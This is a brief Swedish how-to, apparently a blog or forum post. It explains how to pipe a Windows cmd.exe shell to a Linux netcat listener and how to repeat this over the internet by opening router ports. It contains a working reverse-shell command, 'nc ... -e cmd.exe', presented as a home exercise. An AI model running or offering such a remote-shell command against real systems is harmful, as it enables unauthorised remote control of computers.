På din linux maskin skriver du

nc -l 9090

På fjärrdatorn (windows) skriver du

nc 192.168.1.222 9090 -e cmd.exe

Vips lustigt så har du ett dos-shell från windows maskinen i ditt linux shell. Om du vill göra denna övning över internet så måste rätt portar öppnas i de routrar på vägen mellan maskinerna.

Netcat (nc) finns default i de flesta linux, för windows så måste du ladda ner filen från SecurityFocus eller eller från mig (samma fil)